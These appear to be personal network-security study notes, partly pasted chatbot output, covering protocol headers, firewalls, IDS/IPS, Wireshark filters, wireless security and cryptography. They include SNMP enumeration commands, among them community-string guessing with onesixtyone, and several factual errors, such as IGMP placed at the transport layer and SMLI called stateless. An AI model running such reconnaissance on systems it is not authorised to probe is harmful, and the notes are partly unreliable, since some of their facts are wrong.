| | | | Identification (16 bits)                    | | |
| | | +---------------------------------------------+ | |
| | | | Flags  | Fragment Offset (13 bits)          | | |
| | | +---------------------------------------------+ | |
| | | | Time to Live | Protocol (8 bits)             | | |
| | | |   [1: ICMP]  [2: IGMP]  [6: TCP]            | | |
| | | +---------------------------------------------+ | |
| | | | Header Checksum (16 bits)                   | | |
| | | | Source IP Address (32 bits)                  | | |
| | | | Destination IP Address (32 bits)             | | |
| | | +---------------------------------------------+ | |
| | | |                   Options (Variable)         | | |
| | | +---------------------------------------------+ | |
| | | |                   Payload/Data                 | | |
| | | |                     (M bytes)                 | | |
| | | +---------------------------------------------+ | |
| | +------------------------------------------------+ | |
| |                             + Checksum                |
| |                             + Flags                   |
| |                             + Total Length            |
| |                             + Source/Destination IP   |
| +----------------------------------------------------+ |
+--------------------------------------------------------+

+--------------------------------------------------------+
|                     ICMP Packet                        |
| +----------------------------------------------------+ |
| |                     ICMP Header                    | |
| | +--------------------------------------------+    | |
| | | Type (8 bits)                           |      | |
| | | Code (8 bits)                           |      | |
| | | Checksum (16 bits)                     |      | |
| | | Identifier (16 bits)                  |      | |
| | | Sequence Number (16 bits)              |      | |
| | +--------------------------------------------+    | |
| | | Payload/Data (Variable Length)           |      | |
| | +--------------------------------------------+    | |
| +----------------------------------------------------+ |
|                             + Checksum                |
|                             + Type                   |
|                             + Code                   |
+--------------------------------------------------------+

+--------------------------------------------------------+
|                     IGMP Packet                        |
| +----------------------------------------------------+ |
| |                     IGMP Header                    | |
| | +--------------------------------------------+    | |
| | | Type (8 bits)                           |      | |
| | | Max Response Time (8 bits)             |      | |
| | | Checksum (16 bits)                     |      | |
| | | Group Address (32 bits)                |      | |
| | +--------------------------------------------+    | |
| | | Payload/Data (Variable Length)           |      | |
| | +--------------------------------------------+    | |
| +----------------------------------------------------+ |
|                             + Checksum                |
|                             + Type                   |
|                             + Group Address          |
+--------------------------------------------------------+
+-------------------------------------------------------------+
|                    ARP Datagram                             |
| +---------------------------------------------------------+ |
| | Hardware Type (16 bits)                                 | |
| |      - 1: Ethernet                                      | |
| |      - 6: IEEE 802.3                                    | |
| +---------------------------------------------------------+ |
| | Protocol Type (16 bits)                                 | |
| |      - 0x0800: IPv4                                     | |
| +---------------------------------------------------------+ |
| | Hardware Size (8 bits)                                  | |
| |      - 6: MAC Address                                   | |
| +---------------------------------------------------------+ |
| | Protocol Size (8 bits)                                  | |
| |      - 4: IPv4 Address                                  | |
| +---------------------------------------------------------+ |
| | Opcode (16 bits)                                        | |
| |      - 1: Request                                       | |
| |      - 2: Reply                                         | |
| +---------------------------------------------------------+ |
| | Sender MAC Address (48 bits)                            | |
| +---------------------------------------------------------+ |
| | Sender IP Address (32 bits)                             | |
| +---------------------------------------------------------+ |
| | Target MAC Address (48 bits)                            | |
| +---------------------------------------------------------+ |
| | Target IP Address (32 bits)                             | |
| +---------------------------------------------------------+ |
| | Optional Padding (Variable Length)                      | |
| +---------------------------------------------------------+ |
+-------------------------------------------------------------+
+--------------------------------------------------------+
|                    Data Link Layer                    |
| +----------------------------------------------------+ |
| |                     Ethernet Frame                  | |
| | +------------------------------------------------+ | |
| | |                   Ethernet Header                 | | |
| | | +-----------------------------------+ +-----------+ | |
| | | | Destination MAC Address (48 bits) | | Source MAC Address (48 bits) | | |
| | | +-----------------------------------+ +-----------+ | |
| | | | Type (Ethertype) (16 bits)            | | | 
| | | | [0800: IP] [0806: ARP] [0001: IGMP]  | | |
| | | +-------------------------------------+  | | | 
| | | |               Payload/Data            |  |   | 
| | | |                    (D bytes)          |  |   |
| | | +-------------------------------------+  |   |
| | | |               Frame Check Sequence (FCS) (32 bits)                 | |
| | | +----------------------------------------------------+ |
| | +----------------------------------------------------+ |
| +--------------------------------------------------------+
|                             + FCS                     |
|                             + Type                    |
|                             + Destination/Source MAC   |
+--------------------------------------------------------+

Changes Made

1. Application Layer: The top layer is where the DNS protocol resides.
2. Transport Layer: The TCP segment displays as it properly belongs in this segment of the stack.
3. Internet Layer: ICMP and IGMP are indicated within the protocol section, showing that they operate at this layer.
4. Data Link Layer: Ethernet frame is shown here, accurately reflecting its place in the networking stack.

+------------------+
|    Application    |
|    Layer          |
|  +--------------+ |
|  |  DNS         | |  <- Uses UDP
|  +--------------+ |
|                  |
|  +--------------+ |
|  |  HTTP        | |  <- Uses TCP
|  +--------------+ |
|                  |
|  +--------------+ |
|  |  FTP         | |  <- Uses TCP
|  +--------------+ |
|                  |
|  +--------------+ |
|  |  SMTP        | |  <- Uses TCP
|  +--------------+ |
+------------------+

+------------------+
|    Transport      |
|    Layer          |
|  +--------------+ |
|  |  TCP         | |  <- Reliable, Connection-Oriented
|  +--------------+ |
|  |  UDP         | |  <- Unreliable, Connectionless
|  +--------------+ |
|  |  IGMP        | |  <- Internet Group Management Protocol
|  +--------------+ |
+------------------+

+------------------+
|    Internet       |
|    Layer          |
|  +--------------+ |
|  |  IP          | |  <- Internet Protocol
|  +--------------+ |
|  |  ICMP        | |  <- Internet Control Message Protocol
|  +--------------+ |
|  |  ARP         | |  <- Address Resolution Protocol
|  +--------------+ |
+------------------+

+------------------+
|    Link          |
|    Layer          |
|  +--------------+ |
|  |  Ethernet     | |
|  +--------------+ |
|  |  Wi-Fi        | |
|  +--------------+ |
+------------------+

PDU Sizes Summary for ASCII Art

TCP Segment

Total Size: 20 + N (TCP Header + Data)

IP Packet

Total Size: 20 + M (IP Header + Data)

Ethernet Frame

Total Size: 14 + D + 4 (Ethernet Header + Data + FCS)

Explanation of the Above Sections

1. TCP Segment:

   • TCP Header: Includes fields such as Source Port, Destination Port, Sequence Number, Acknowledgment Number, Flags, and Checksum.
     • Flags: Control flags like SYN, ACK, FIN, etc.
     • Checksum: For error-checking the header and data.
     • Payload/Data: The actual data being transmitted.

2. IP Packet:

   • IP Header: Contains fields like Version, Header Length (IHL), Type of Service, Total Length, and more.
     • Checksum: Verifies the integrity of the packet.
     • Source and Destination IP Addresses: Indicate where the packet is from and going.

3. Ethernet Frame:

   • Ethernet Header: Includes Destination and Source MAC Addresses, and Ethertype.
     • Payload/Data: The data being carried.
     • Frame Check Sequence (FCS): A CRC value used for integrity checking.

Conclusion

These representations showcase how protocol headers, checksums, flags, and the contents of PDUs are structured at different layers of the OSI model. Each protocol has defined fields to manage the transmission of data effectively, ensuring integrity and proper delivery across networks.

TCP/IP

or Internet Protocol Suite, is a more streamlined networking framework compared to the OSI model. It consists of four layers, each corresponding to certain functionalities in the network communication process. Here’s a breakdown of the TCP/IP model layers:

1. Application Layer: This is the topmost layer of the TCP/IP model. It encompasses all protocols that provide services directly to user applications. This layer is responsible for processes such as data formatting, encryption, and application-level interactions. Common protocols include:

   • HTTP/HTTPS: For web browsing.
   • SMTP: For email transmission.
   • FTP: For file transfer.
   • DNS: For domain name resolution[S1].

2. Transport Layer: This layer provides reliable or unreliable delivery of data between applications. It ensures that messages are delivered in the correct order and without errors. The key protocols at this layer are:

   • TCP (Transmission Control Protocol): Provides reliable, connection-oriented service with error recovery and flow control.
   • UDP (User Datagram Protocol): Provides an unreliable, connectionless service suitable for applications that require fast transmission without the overhead of reliability.[S1]

3. Internet Layer: The internet layer is responsible for addressing, packaging, and routing functions. It manages the delivery of packets across different networks and provides logical addressing through IP addresses. Key protocols include:

   • IP (Internet Protocol): The primary protocol for routing packets across networks (with versions IPv4 and IPv6).
   • ICMP (Internet Control Message Protocol): Used for diagnostic and error-reporting[S1] purposes (e.g., ping).
   • ARP (Address Resolution Protocol): Resolves IP addresses to MAC addresses.[S1]

4. Network Interface Layer (or Link Layer): This is the lowest layer, which is responsible for the physical transmission of data over a network medium. It encompasses the hardware and protocols that operate on the local network segment. Functions include framing, addressing, and error detection. Common protocols and technologies at this layer include:

   • Ethernet: The standard for wired local area networks (LAN).
   • Wi-Fi: Wireless local area networking technology.
   • PPP (Point-to-Point Protocol): Used for direct connections between two network nodes.

Summary

• Application Layer: Interfaces with user applications.
• Transport Layer: Handles end-to-end communication and error-checking.
• Internet Layer: Manages packet addressing and routing.
• Network Interface Layer: Deals with the physical transmission of data.

Network Islolation

assets on net

• Internal firewalls
• Access control list(ACL)
• Demateralized Zone(DMZ)

DMZ

• DNS
• FTP
• VoIP
• Web Servers

Sure! Below is the combined cheat sheet that includes both the DNS records table and the command-line tools for querying and managing DNS.

DNS Cheat Sheet

Overview

The Domain Name System (DNS) is a hierarchical naming system used to translate human-readable domain names (e.g., <www.example.com>) into numerical IP addresses (e.g., 192.0.2.1) required for locating and identifying computer services and devices.

Common DNS Record Types

Common DNS Command-Line Tools

1. nslookup: Utility for querying the DNS.

   • Basic Query:

     nslookup example.com
     

   • Query a Specific Record Type (e.g., MX):

     nslookup -query=MX example.com
     

   • Use a Specific DNS Server:

     nslookup example.com 8.8.8.8
     

2. dig (Domain Information Groper): Advanced tool for DNS queries.

   • Basic Query:

     dig example.com
     

   • Query a Specific Record Type (e.g., CNAME):

     dig example.com CNAME
     

   • Query with Detailed Output:

     dig +short example.com
     

   • Query a Specific DNS Server:

     dig @8.8.8.8 example.com
     

3. host: Simple utility for DNS lookups.

   • Basic Query:

     host example.com
     

   • Query a Specific Record Type (e.g., A):

     host -t A example.com
     

   • Query a Specific Record Type (e.g., MX):

     host -t MX example.com
     

4. whois: Retrieves ownership and registration information for a domain.

   • Basic Query:

     whois example.com
     

5. ping: Resolves a hostname to an IP address.

   • Basic Ping Command:

     ping example.com
     

6. traceroute: Shows the path packets take to reach a domain.

   • Basic Command:

     traceroute example.com
     

7. dig for DNSSEC (if enabled):

   • Query a DNSKEY Record:

     dig example.com DNSKEY
     

   • Query a DS Record:

     dig example.com DS
     

Summary

Understanding both DNS record types and common command-line tools is essential for effective domain management and troubleshooting DNS-related issues. These commands will help you query and verify DNS configurations efficiently.

Firewall

Limitation of Firewall

• Does not prevent backdoor attack[S1]
• Does not prevent password misuse
• Does not protect the net from internal atks
• Cannot do anything if the net design and conf is faulty
• Not able to prevent social engineering threats

Packet filtering

• ip
• protocols
• ports
• rules

WAF

WAFs stands for Web Application Firewalls.

A Web Application Firewall is a security solution designed to monitor, filter, and protect web applications from various types of online threats and attacks, including SQL injection, cross-site scripting (XSS), and other application-layer vulnerabilities. WAFs operate at the application layer (Layer 7 of the OSI model) and analyze incoming traffic to and from a web application.

Key features of WAFs include:

• Traffic Monitoring: Analyzing HTTP/HTTPS traffic to identify and block malicious requests.
• Rule-Based Protection: Applying predefined or custom rules to filter out harmful traffic.
• Threat Detection: Utilizing security policies to recognize abnormal behavior and potential attacks.
• Session Protection: Managing and securing user sessions to prevent session hijacking.

WAFs can be deployed as hardware appliances, software solutions, or cloud-based services.

Here’s the updated comparison table of popular Web Application Firewalls (WAFs), including both commercial and open-source options, along with their estimated usage rates and their integration capabilities with Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS), and other filtering products.

Key

• Excellent: Seamless integration with multiple IDS/IPS and filtering products.
• Very Good: Strong integration capabilities, generally easy to configure.
• Good: Detectable integration; some configuration may be required.
• Moderate: Feasible integration but potentially more complex or less common.
• Low: Limited to no integration with IDS/IPS systems.

When evaluating a WAF’s integrity and compatibility with IDS/IPS systems, it’s crucial to assess the ease of integration and the level of support provided by each WAF. Each organization’s specific requirements and existing security infrastructure will guide the choice of which WAF is the best fit.

Circuit-level gw

• Between session and transportlayer of OSI model
• App layer of TCP/IP model

A circuit-level gateway is a type of firewall that operates at the transport layer (Layer 4) of the OSI model. It provides a means of controlling network traffic over a network, primarily focused on monitoring and managing TCP connections. Here are the key characteristics and functionalities of circuit-level gateways:

Key Characteristics

1. Connection Monitoring:

   • A circuit-level gateway establishes a virtual circuit between clients and servers in a networked environment and monitors the traffic that passes through it.

2. Session Management:

   • Circuit-level gateways maintain the state of each connection. They keep track of sessions and verify that packets are part of a valid session.

3. Protocol Independence:

   • They can work with any protocol that operates above the transport layer, allowing them to provide security for a variety of applications.

4. No Packet Inspection:

   • Unlike application-layer gateways, circuit-level gateways do not inspect the contents of packets; they only monitor the headers and are concerned with the state and management of connections.

5. Performance:

   • Circuit-level gateways tend to be faster than application-layer gateways because they do not analyze the data content, leading to lower processing overhead.

Functions

• Traffic Filtering: Circuit-level gateways can enforce policies for which types of traffic are allowed or denied based on the established connections.
• Address Translation: Some circuit-level gateways may perform Network Address Translation (NAT), allowing multiple devices on a local network to share a single public IP address.
• Security: They provide a level of security by preventing unauthorized access to internal networks and managing which external entities can establish connections.

Use Cases

• VPNs (Virtual Private Networks): Circuit-level gateways are often used in VPNs to establish secure connections between remote users and internal networks.
• Network Address Translation (NAT): They can perform NAT, which helps in managing IP address usage.

Limitations

• Limited Inspection[S1]: Due to the lack of deep packet inspection, circuit-level gateways may be less effective at detecting certain types of malicious activities or sophisticated attacks compared to application-level firewalls.
• State Management[S1]: If the connection state is not properly managed, it could lead to vulnerabilities, such as session hijacking.

In summary, circuit-level gateways serve a crucial role in managing TCP connections and providing a basic structural layer of security in network communications, particularly suitable for scenarios where performance and session management are priorities.

App layer gw

• packet headers/data
• filtering content/URL
• authentication

App proxy

• filters messages at app layer to protect net resources
• known as a proxy firewall/gw firewall

SMLI

• advance packet filtering for all 7 layers

Stateless Multilayer Inspection (SMLI)

1. Definition:

   • SMLI is a technique used in network security where packets are analyzed at multiple layers of the OSI model without maintaining state information about the connection. It focuses on inspecting each packet independently.

2. Purpose:

   • The goal of SMLI is to enhance security by applying checks at various protocol layers—such as the network layer, transport layer, and sometimes the application layer—without needing to remember connection states.[S1]

3. Features:

   • Packet Filtering: Performs filtering based on predefined rules without needing context from previous packets.[S1]
   • Layered Inspection: Evaluates packets according to multiple layers of protocols to identify potentially malicious traffic.
   • Simplicity: Simpler to implement compared to stateful inspection since it does not require management of connection states.

4. Use Cases:

   • Firewalls: Used in some firewall implementations to filter traffic based on objective criteria at different layers.
   • Intrusion Detection Systems (IDS): Employed in IDS to quickly analyze and respond to potential threats without needing a deep contextual understanding of sessions.

Importance in Cybersecurity

• SMLI can be beneficial for environments where speed is crucial, and quick decisions on packet handling are required. It provides a straightforward mechanism for filtering traffic but may not be as effective at identifying sophisticated attacks that require context, such as those relying on session information or established connections.

Remember: SMLI used in firewall, Circuit-gw used in VPN

NAT

• allows devices on a private net to communicate with the internet
• hiding their IP address from external devices

VPN

• protect against unauthorized:
• users intercepting & exploiting a VPN con.

IDS/IPS [1]

They used for detection and prevention atks.

IDS

For analyzing files data income/outcome by HIDS. inspects network traffic at packet level by NIDS.

Types

• HIDS(Hosted-based intrusion detection system)
• NIDS(Network-based intrusion detection system)

Disadvantages

• Require more maintenance compared to firewall
• Require propoerly trained and experienced users to maintain it

Limitation

• Network logging system
• Vulnerability assesment tools
• No consider an antivirus product
• Cryptographic systems

IPS

Include

• Network traffic system
• Anti-Virus
• Anti-Malware

Activites

• Reporting
• Blocking
• Droping

Located on

• Edge perimeter
• Data Center

Types

• HIPS(Hosted-based intrusion prevention system)
• NIPS(Network-based intrusion prevention system)
• WIPS(Wireless-based intrusion prevention system)
• NBA(Network behavior analysis): To prevent DDOS atks

Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS) can be connected to the Internet, but their deployment might vary based on network architecture, security requirements, and roles they are intended to play within a network. Here’s how they typically fit into network designs, including considerations with NAT (Network Address Translation):

1. Connection to the Internet

• IDS/IPS as Standalone Devices: IDS and IPS are often deployed between the external network (Internet) and the internal network to monitor and protect traffic. In this setup, they can analyze incoming and outgoing traffic for malicious activities or policy violations.

• Traffic Analysis: An IDS primarily monitors traffic and alerts administrators of any suspicious activity, while an IPS can take action in real-time to block or prevent malicious traffic. Such systems can be placed at the perimeter of the network, or within the segmented network for different layers of protection.

2. NAT Considerations

• NAT Overview: Network Address Translation (NAT) is a method used to modify network address information in IP packet headers while in transit across a traffic routing device. It helps in conserving IP addresses and providing an additional layer of security by hiding internal IP addresses from the external world.

• Deployment with NAT:

  • Before NAT: An IDS/IPS can be placed before the NAT device (e.g., a router or firewall) to monitor all traffic entering and leaving the network. This allows the IDS/IPS to see original source and destination IP addresses.
  • After NAT: If an IDS/IPS is placed after NAT, it will only see the translated IP address, which may limit its ability to analyze the complete context of the traffic. This setup can still be useful for monitoring internal traffic or traffic from specific internal segments [S3].

3. Design Best Practices

• Network Segmentation: Deploying IDS/IPS within different segments of your network can enhance security and monitoring capabilities.

• Combining IDS/IPS with Firewalls: Often, these systems work in conjunction with firewalls to provide layered security. Firewalls can block unauthorized access, while IDS/IPS can monitor for and respond to suspicious activity.

• Placement and Configuration: Proper placement within the network and configuration are critical to ensure that IDS/IPS can effectively detect and respond to threats without causing disruptions or missing crucial data.

IDS and IPS can indeed be connected to the Internet[S1], and their deployment can be designed with or without NAT, depending on the desired monitoring capabilities and network architecture. Understanding their placement in relation to NAT and Internet connectivity helps in optimizing the security posture of an organization. For effective implementation, consider factors like network design, traffic flow, and potential threats.

Attacking an Intrusion Detection System (IDS) or Intrusion Prevention System (IPS) can provide several advantages[S1] to an adversary. Here are some key motivations and potential benefits an attacker might seek through such an attack:

1. Bypassing Security Controls

• Evasion of Detection: If an attacker successfully compromises or disables an IDS/IPS, they can carry out malicious activities without detection. This can lead to unauthorized access, data exfiltration, or exploitation of vulnerabilities.

• Manipulating Alerts: An attacker may try to flood the IDS/IPS with false alerts or crafted traffic, causing it to become overwhelmed (a kind of denial of service) and making it unable to detect legitimate threats.

2. Data Exfiltration

• Stealthy Data Theft: With the IDS/IPS offline or manipulated, an attacker can steal sensitive information (data exfiltration) from the network without triggering alarms.

• IP Spoofing and Traffic Manipulation: If they can alter how traffic is perceived, they might re-route sensitive data through paths that wouldn’t ordinarily be monitored, further avoiding detection.

3. Gaining Insight into Network Defenses

• Reconnaissance: By attacking an IDS/IPS, an attacker can gather valuable information about the network’s defenses, including what types of monitoring are in place, which protocols are most frequently monitored, and what the response policies are.

• Understanding Alerts and Responses: If they can observe the behavior of the IDS/IPS, they may learn what kind of activities are flagged, allowing them to tailor their attacks to circumvent those specific defenses.

4. Facilitating Further Attacks

• Lateral Movement: Once inside the network and with the IDS/IPS compromised, an attacker can move laterally to other systems and escalate privileges without being detected.

• Deploying Additional Malicious Tools: An attacker might install backdoors or other malware on the network without alerting security systems, facilitating ongoing access.

5. Creating Mistrust in Security Systems

• Undermining Confidence: If an attacker is able to demonstrate that the IDS/IPS can be easily compromised, it can erode trust in the overall security posture of the organization. This may lead to questions about the effectiveness of other security measures.

• Psychological Manipulation: Knowing that security measures can be bypassed can embolden attackers, potentially increasing the frequency or intensity of attacks.

Conclusion

Attacking an IDS/IPS can provide significant advantages to an attacker by allowing them to bypass security measures, steal data, gain insights into network defenses, and carry out further attacks with reduced risk of detection. Therefore, it is critical for organizations to maintain robust security controls, regularly update their IDS/IPS systems, conduct penetration testing, and implement layered security strategies to mitigate these risks.

Proxy Server [1]

Set up as a filter/firewall.

Advantages

• Secure employees’ internet activity
• Balance internet traffic to prevent internal crashed
• Control the website employees access in the office
• Save bandwidth by caching files/compressing incoming traffic

Types

Transparent

Gives users an identical experience

SOCK

Operates at the TCP level. Channeling traffic through a proxy

Anonymous

Hiding identity and computer info, Untraceable internet activity.

Reverse

Forwards requests from browser to the web servers. Intercepting req.

VPN

Creating an encrypted tunnel.

Components

• VPN client
• Network access server
• Tunnel terminating device
• VPN protocol

Types

• Remote Access: Device-to-net
• Site-to-site: Net-to-net

Encryption Protocols used in VPN

• 3DES
• Secure socket layer
• OpenVPN

Firewall managing technologies

• VPN Firewalls: front/back of the VPN server. HD/SW.
• IPSec: Enc/Decryption of data
• AAA server: stands for authn, autho, and accounting
• RADIUS: Authenticate a VPN user imitates VPN con by credentials

RADIUS

Topologies

• Hub-and-spoke
• Point-to-point
• Full mesh
• Star

Tools

Using tools like Wireshark to analyze a specific TCP port (in this case, port 9001) and want a structured approach similar to what you might find on a website like auditmypc.com. Below is a guide on how to troubleshoot and analyze TCP port 9001 using Wireshark, along with ASCII art and a detailed breakdown.

Troubleshooting and Malware Analysis for TCP Port 9001 Using Wireshark

Step 1: Set Up for Packet Capture

1. Open Wireshark: Launch the application on your computer.
2. Select the Network Interface: Choose the appropriate network interface (Wi-Fi, Ethernet) you intend to monitor.

-----------------------------
|      Start Wireshark      |
| Select Your Network        |
-----------------------------

Step 2: Start Packet Capture

3. Start the Capture: Click on the “Capture” menu and select “Start”.
4. Filter for TCP Port 9001: Immediately apply a capture filter to monitor specific traffic. The filter syntax for capturing only packets using TCP port 9001 is:

tcp port 9001

-----------------------------
|       Capture Filter       |
|      tcp port 9001        |
-----------------------------

Step 3: Generate Traffic on TCP Port 9001

5. Initiate Traffic: From your local machines or any applications that utilize TCP port 9001, generate some traffic. This could involve using an application that establishes a connection to a server on that port.

---------------
| Generate TCP |
| Traffic on   |
| Port 9001    |
---------------

Step 4: Stop the Capture

6. Stop Packet Capture: Once you have generated sufficient traffic, return to Wireshark and click on “Stop”.

---------------------
|    Stop Capture    |
---------------------

Step 5: Analyze the Captured Packets

7. Display and Analyze the Capture:

   • Use display filters to narrow down to TCP port 9001:

   tcp.port == 9001
   

-----------------------------
|      Apply Display Filter   |
|    tcp.port == 9001        |
-----------------------------

8. Review Packet Details: Click on individual packets to inspect the details in the middle pane. Look for TCP flags like SYN, ACK, or RST.

-------------------------------
|      Check TCP Flags        |
| SYN, ACK, RST, FIN          |
-------------------------------

Step 6: Use Expert Information

9. Utilize Expert Information: Go to the “Statistics” menu and select “Expert Information” to find any warnings or errors that may indicate issues with the packets.

---------------------------------
|     Expert Information        |
|  (Warnings/Errors Detected)  |
---------------------------------

Step 7: Reference and Documentation

10. Reference TCP Port 9001: According to auditmypc.com, verify what TCP port 9001 is used for. TCP port 9001 is commonly associated with a variety of services, including application monitoring and control. You can look up more about its specific use in your case.

Understanding the Context for Port 9001

• Common Uses: Port 9001 is often used for applications like JMX (Java Management Extensions) or other custom application management tasks.
• Malware Indicators: Watch for unknown connections or large amounts of data to unfamiliar hosts as potential malware indicators when reviewing captured traffic.

ASCII Flow Diagram of Steps

 Start Wireshark
      |
      v
  Start Capture
      |
      v
Apply Capture Filter: tcp port 9001
      |
      v
 Generate Traffic
      |
      v
   Stop Capture
      |
      v
Apply Display Filter: tcp.port == 9001
      |
      v
Analyze Captured Packets
      |
      v
Review Expert Information
      |
      v
  Document Findings

Final Note

Check the website Auditmypc.com/tcp-port-9001.asp Always remember to comply with legal and ethical standards when capturing packets and monitoring network traffic. Analyze the context of the traffic and the specific applications you are dealing with when investigating potential security issues or malware.

Wireshark Capture Filters Cheat Sheet

Modes

• Promiscuous mode:

Is a network interface mode that allows the network device (NIC) to intercept and read every packet that travels across the network, regardless of its destination MAC address. This mode is particularly useful in packet capturing and network monitoring.

Basic Filters

• All Traffic: ``
• Specific Protocol (e.g., TCP): tcp
• Specific Protocol (e.g., UDP): udp
• Specific Protocol (e.g., ICMP): icmp
• Specific Protocol (e.g., HTTP): tcp port 80

IP Address Filters

• Capture Traffic from a Specific IP: host 192.168.1.10
• Capture Traffic to a Specific IP: host 192.168.1.10
• Capture Traffic from a Specific Subnet: net 192.168.1.0/24
• Capture Traffic to/from Multiple IPs: host 192.168.1.10 or host 192.168.1.20

Port Filters

• Capture Traffic on a Specific Port: port 443
• Capture Incoming Traffic on a Specific Port: dst port 443
• Capture Outgoing Traffic on a Specific Port: src port 443
• Capture Traffic on a Range of Ports: portrange 8000-9000

Protocol-Specific Filters

• HTTP Traffic: tcp port 80 or tcp port 8080
• HTTPS Traffic: tcp port 443
• DNS Traffic: udp port 53
• FTP Traffic: tcp port 21

Complex Filters

• Combine Filters with AND: tcp and host 192.168.1.10
• Combine Filters with OR: tcp or udp
• Exclude Specific Traffic: tcp and not port 22

Time-based Filters

• Capture Traffic Within a Specific Time Frame (Note: Wireshark capture filters do not provide this capability directly. Use display filters post-capture for time filtering).

Examples

1. Capture only TCP traffic from a specific host:

   tcp and host 192.168.1.10
   

2. Capture only HTTP and HTTPS traffic:

   tcp port 80 or tcp port 443
   

3. Capture all traffic except for DNS and HTTP:

   not (port 53 or port 80)
   

4. Capture traffic to a specific subnet, excluding a particular IP:

   net 192.168.1.0/24 and not host 192.168.1.5
   

Note

• Capture Filters vs. Display Filters: Capture filters are set before capturing traffic and limit what gets captured. Display filters are applied after capturing and can be used to analyze the captured packets.
• Syntax: Be mindful of the correct syntax for capture filters, which is slightly different from display filters.

How to Apply Filters in Wireshark

• In Wireshark, go to Capture Options and enter your capture filter in the “Capture Filter” field.

Using the above filters will help you efficiently capture and analyze only the relevant network traffic. If you have any specific scenarios in mind or need more filters, feel free to ask!

Here’s a concise cheat sheet of commonly used display filters for Wireshark (as of the latest version). You can use these filters to capture or analyze specific types of network traffic more effectively.

Wireshark Display Filters Cheat Sheet

Basic Protocol Filters

• HTTP: http
• HTTPS: tls
• DNS: dns
• TCP: tcp
• UDP: udp
• ICMP: icmp
• ARP: arp
• RTP: rtp
• SMTP: smtp
• POP3: pop
• IMAP: imap

Address and Port Filters

• Source IP Address: ip.src == x.x.x.x
• Destination IP Address: ip.dst == x.x.x.x
• Source Port: tcp.srcport == 80
• Destination Port: tcp.dstport == 443
• Any IP Address: ip.addr == x.x.x.x
• Any TCP Port: tcp.port == 80

Protocol and Application-Specific Filters

• Show all HTTP requests: http.request
• Show all HTTP responses: http.response
• Show all DNS queries: dns.qr == 0
• Show all DNS responses: dns.qr == 1
• Show all traffic to a specific web server: http.host == "example.com"

Logical Filters

• AND Operator: tcp && http (SHOW TCP packets that also contain HTTP)
• OR Operator: http || dns (SHOW HTTP or DNS packets)
• NOT Operator: !http (SHOW packets that are NOT HTTP)

Field Filters

• Filtering by Content: frame contains "abc" (SHOW packets containing the string “abc”)
• Filtering by Length: frame.len > 100 (SHOW packets longer than 100 bytes)
• Filtering by TCP Flags: tcp.flags.syn == 1 (SHOW SYN packets)

Time-Related Filters

• Filtering packets in a certain time frame: frame.time >= "2023-03-01 00:00:00" && frame.time <= "2023-03-02 00:00:00"

Miscellaneous Filters

• Follow TCP Stream: tcp.stream eq 0 (SHOW all packets in the TCP stream with index 0)
• Coloring Filters (to be used in the Coloring Rules):
  • HTTP: http
  • Telnet: telnet

Combining Filters

You can combine filters using parentheses for complex queries:

((ip.src == 192.168.1.1 && tcp.dstport == 80) || (ip.src == 192.168.1.2 && tcp.dstport == 443))

Additional Useful Filters

• Malformed Packets: malformed
• Errors: tcp.analysis.flags
• Duplicate Acknowledgments: tcp.analysis.ack_rtt

Tips for Using Filters in Wireshark

• Start typing in the Display Filter toolbar; Wireshark provides autocomplete suggestions.
• Use color coding to quickly identify packets of interest based on your filters.

SNMP

Tools SNMP enum

./snmpenum.pl ip public linux.txt > myFW.txt

Output listenin udp/tcp ports, sys info.

Public string:

snmpcheck -1.8.pl -t ip

snmpcheck.pl 71.8 -SNMP enumerator

snmpcheck.pl 71.8 -SNMP enumerator

onesixtyone

Important

Non-public string as an alternative of SNMP:

./onesixtyone -c dict.txt ip

Protocols

WEP [1]

• RC4 stream cipher
• 40-128 bit
• Initialization Vector (IV)
• Vunerable to brute-force attacks

WPA [1]

• Wi-Fi Alliance in 2003
• Temporoal Key Intergrity Protocol(TKIP)
• WPA-Personal/Enterprise

WPA2 [1]

• Released in 2004
• AES
• Counter Mode Cipher Block Chaining Message(CCMP)

WPA3 [1]

• 2018
• Simultaneous authentication of Equals(SAE)
• Device Provisioning Protocol (DPP) system
• GCMP
• Galois/Counter Mode Protocol

Open Authentication

• is a method from the first 802.11 standard without req pre-shared keys or credentials.

Extensible Authentiation Protocol(EAP)

#radius

Light EAP

• Allowing clients to re-auth
• Dynamic WEP keys
• Version of MS.Chap

EAP flexible authenticaion secure tunneling have 3 phases.

Wireless Security Measure

Commands

iwconfig

Cryptography

• Symmetric
• Asymmetric

Encryption

• Plain-text to cipher-text

Decryption

• Cipher-text to plain-text

Government Access to Keys

GAK is a cryptographic concept where the government has full or partial access to private and public keys, which are only used or released under specific circumstances when a court warrant is issued. This is known as a key escrow(digital forensics purpose).

Encryption Algorithms

Here’s a comparative table highlighting the key differences between symmetric and asymmetric encryption:

Summary

• Symmetric Encryption: Involves a single shared key for both encryption and decryption, making it efficient but more complex to distribute securely.
• Asymmetric Encryption: Utilizes a pair of keys (public and private), enhancing security and ease of key management but generally at the cost of computational efficiency.

Both symmetric and asymmetric encryption approaches play vital roles in securing communications, often working together in practice, such as using asymmetric encryption to securely exchange symmetric keys. If you have further questions or need additional details, feel free to ask!

DES

• 8 bit for parity bits

After verification 8 bit for parity bits will be dropped.

AES

• 10 rounds for 128-bit keys
• 12 rounds for 192-bit keys
• 14 rounds for 256-bit keys

RC 4/5

DSA

Comparison

Here’s a comparative table for RSA, AES, DES, RC4, RC5, and DSA, highlighting their key features, types, strengths, and weaknesses.

Notes

1. RSA: Primarily used for secure data transmission and digital signatures. Its security relies on the difficulty of factoring large integers.
2. AES (Advanced Encryption Standard): A widely used symmetric encryption standard that is considered secure and efficient.
3. DES (Data Encryption Standard): An older symmetric encryption algorithm that has largely been replaced by AES due to security vulnerabilities.
4. RC4: A stream cipher that was widely used but has well-documented vulnerabilities, making it unsuitable for new applications.
5. RC5: A flexible block cipher that allows for variable block sizes and key lengths, but may also have vulnerabilities under certain conditions.
6. DSA (Digital Signature Algorithm): Used for digital signatures and relies on discrete logarithms for security. Key length must be sufficiently large to ensure security.

Hashing

HAsh

MDF

Here’s a comparative table of Hash1 and Hash2 vs. Message Digest (MD) algorithms. I’ll consider “Hash1” as a general reference to any hashing algorithm and “Hash2” similarly. However, for the purpose of clarity, I’ll provide details typically related to known hashing algorithms such as SHA-1 (Hash1), SHA-256 (Hash2), and Message Digest 5 (MD5).

